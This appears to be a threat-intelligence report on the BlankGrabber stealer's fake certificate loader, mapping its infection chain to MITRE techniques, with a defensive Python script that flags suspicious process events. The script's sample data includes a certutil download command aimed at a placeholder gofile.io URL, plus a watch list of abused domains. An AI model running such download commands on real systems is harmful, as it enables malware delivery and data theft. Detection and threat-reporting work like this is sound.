BlankGrabber Malware Exploits Fake Certificate Loader for Stealthy Attacks

Severity: High (Score: 67.5)

Sources: Cybersecuritynews, Gbhackers

Summary

BlankGrabber's operators are using a fake certificate loader to conceal a multi-stage infection chain built from Rust and Python components. The method relies on built-in Windows tools such as certutil.exe and on heavily obfuscated PyInstaller stubs to evade detection. The chain begins with a batch script hosted on Gofile.io, which downloads a Rust executable masquerading as a certificate. Once executed, the loader performs anti-sandbox checks and drops a self-extracting RAR archive containing a remote-access client and the BlankGrabber stealer, giving the attackers remote control and data theft at the same time. The malware targets Windows endpoints and employs several evasion techniques to avoid detection by security tools. Stolen data is exfiltrated through Telegram and public web services. The threat is significant because the stealer extracts sensitive information from browsers and system profiles.

Key Points

  • BlankGrabber uses a fake certificate loader to hide its infection chain.
  • The malware employs sophisticated evasion techniques to avoid detection.
  • It targets Windows systems and can steal sensitive data from browsers.
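The chain described above (batch script, certutil.exe fetching a payload from a public web service) maps onto process-creation telemetry that defenders already collect. The following is an added example, not code from the sources or from any product, that triages constructed Sysmon-style events for those indicators; it assumes certutil's -urlcache switch was the download method, which the report does not state, and the gofile.io path and file names are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
# The gofile.io path and file names are placeholders; the report names only the service.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\Users\alice\Downloads\setup.bat"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f https://gofile.io/d/PLACEHOLDER cert.crt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\Users\alice\corp-root.cer"},  # benign use
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Public services the report associates with hosting and exfiltration for this campaign.
WATCHED_DOMAINS = ("gofile.io", "cdn.discordapp.com")


def assess(event):
    """Return (technique, reason) findings for one process-creation event."""
    findings = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    urls = URL_RE.findall(cmd)
    # T1059: a command shell executing a batch script (the chain's first stage).
    if image.endswith("cmd.exe") and re.search(r"\.bat\b", cmd, re.IGNORECASE):
        findings.append(("T1059", "cmd.exe executing a batch script"))
    # T1105: certutil.exe handed a URL, i.e. used to fetch content rather than manage certificates.
    if image.endswith("certutil.exe") and urls:
        findings.append(("T1105", "certutil.exe invoked with a URL argument"))
        if parent.endswith("cmd.exe"):
            findings.append(("T1105", "certutil download spawned from a command shell"))
    # Any contact with the web services named in the report, regardless of the process.
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS):
            findings.append(("watched-domain", f"URL points at {host}"))
    return findings


def scan(events):
    """Map event index -> findings, keeping only events that produced at least one."""
    return {i: f for i, e in enumerate(events) if (f := assess(e))}
```

Running scan(SAMPLE_EVENTS) flags the batch launch and the certutil download while leaving the local certificate verification untouched; the two hits on the same parent chain are what an analyst would correlate into one incident.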

Key Entities

  • Malware (attack_type)
  • cdn.discordapp.com (domain)
  • BlankGrabber (malware)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • T1105 - Ingress Tool Transfer (mitre_attack)
  • T1567 - Exfiltration Over Web Service (mitre_attack)
  • Windows (platform)
  • Certutil.exe (tool)
  • PyInstaller (tool)